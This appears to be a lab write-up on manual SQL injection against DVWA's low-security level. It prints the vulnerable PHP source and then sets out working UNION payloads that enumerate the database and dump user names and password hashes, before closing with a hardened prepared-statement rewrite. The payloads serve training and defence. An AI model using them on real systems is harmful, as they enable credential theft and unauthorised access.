SQL injection
Manual injection approach:
- Determine whether there is injection, and of which kind (string type, numeric type, etc.)
  When the input parameter is an integer, such as an ID, age or page number, and it is injectable, treat it as numeric injection.
  Difference: a numeric parameter does not need a single quote closed, while a string parameter generally needs the single quote closed first.
- Guess the number of fields in the SQL query (order by num / union select)
- Find the display positions (determine which of the selected fields are echoed on the page)
- Enumerate the database name
- Enumerate the table names
- Enumerate the column names
- Dump the data
DVWA low-level SQL injection
Source code:
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    // Vulnerable point: $id is concatenated straight into the SQL text inside single quotes,
    // so a quote in the input closes the string and the rest of the input is parsed as SQL.
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
- Test in the input box, entering in turn:
  1
  1'
  1''
  From the responses this can be judged to be string-type injection, and the parameter is id.
- Construct the payloads
  Guess the number of fields by entering:
  1' order by 1#
  1' order by 2#
  1' order by 3#
  The number of available fields is 2.
  Enumerate the database (union injection): 1' union select database(),user()#
  The database name is dvwa.
  Enumerate the tables: -1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
  Select the users table.
  Enumerate the column names: -1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#
  Dump the data: -1' union select user,password from users#
  This yields the user names and password hashes (MD5).
- Take admin and its hash 5f4dcc3b5aa765d61d8327deb882cf99 and crack the password.
  Verification: login succeeds.
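As a defensive counterpart to the low-level source shown above, here is a hardened rewrite of the same handler. It is my own added example, not DVWA's code (DVWA's higher levels are written differently), and it assumes the same $GLOBALS["___mysqli_ston"] connection and that user_id is an integer column: the id is validated as a plain integer and bound through a prepared statement, so the quote-closing and UNION payloads from the walkthrough no longer change the query, and database errors are no longer echoed to the user.

```php
<?php
// Hardened version of the DVWA "low" SQL injection handler (my own rewrite).
// Assumption: $db is an open mysqli connection and users.user_id is an INT column.
function lookup_user(mysqli $db, string $raw_id): string {
    // The parameter is numeric, so reject anything that is not a non-negative integer
    // before it reaches the database. Inputs such as "1'" or "-1' union select ..."
    // never get past this check.
    if (!ctype_digit($raw_id)) {
        return '<pre>Invalid ID.</pre>';
    }
    $id = (int) $raw_id;

    // Prepared statement: the SQL text is fixed and the value is sent separately,
    // so user input cannot close the quote or append a UNION.
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    if ($stmt === false) {
        // Generic message only: the original's die(mysqli_error(...)) is what
        // turned "1'" into a visible syntax error for the tester.
        return '<pre>Query error.</pre>';
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($first, $last);

    $html = '';
    while ($stmt->fetch()) {
        // Escape output so values stored in the table cannot inject HTML either.
        $html .= '<pre>ID: ' . htmlspecialchars($raw_id)
               . '<br />First name: ' . htmlspecialchars((string) $first)
               . '<br />Surname: ' . htmlspecialchars((string) $last) . '</pre>';
    }
    $stmt->close();
    return $html;
}

if (isset($_REQUEST['Submit'])) {
    $html = lookup_user($GLOBALS["___mysqli_ston"], (string) ($_REQUEST['id'] ?? ''));
    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
```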
PS: http://itindex.net/detail/54715-%E8%AE%A4%E8%AF%86-sql-%E7%B1%BB%E5%9E%8B
http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html